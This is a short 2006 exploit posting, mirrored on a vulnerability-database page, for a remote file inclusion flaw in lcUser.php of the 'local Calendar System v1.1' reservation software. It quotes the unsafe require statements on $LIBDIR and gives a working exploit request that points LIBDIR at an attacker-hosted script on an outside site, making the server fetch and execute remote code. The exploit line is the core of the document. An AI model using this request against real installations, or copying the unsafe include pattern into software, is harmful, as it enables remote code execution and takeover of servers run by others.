Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:14797
HistoryOct 23, 2006 - 12:00 a.m.

local Calendar System v1.1 (lcUser.php) Remote File Include

2006-10-2300:00:00
vulners.com
53

Β±------------------------------------------------------------------------------------------
local Calendar System v1.1 (lcUser.php) Remote File Include

An advanced instrumentation reservation system for equipment calendaring and user management.

download : ftp://ftp.loci.wisc.edu/locisoftware/LoCal/LoCal-1.1.tar.gz

screenshot : http://www.loci.wisc.edu/calendar/tutorial/monthview.jpg

code :
require "$LIBDIR/lcMembership.inc";
require "$LIBDIR/lcErrorChecker.inc";

exploit:
local/lib/lcUser.php?LIBDIR=http://members.lycos.co.uk/o0xxdark0o3/ms.txt?

greetz :
:( no one

by o0xxdark0o
i think… so that… i m here
[email protected]
##---------------------------------------------------------------------------------------------------

milw0rm.com [2006-10-18]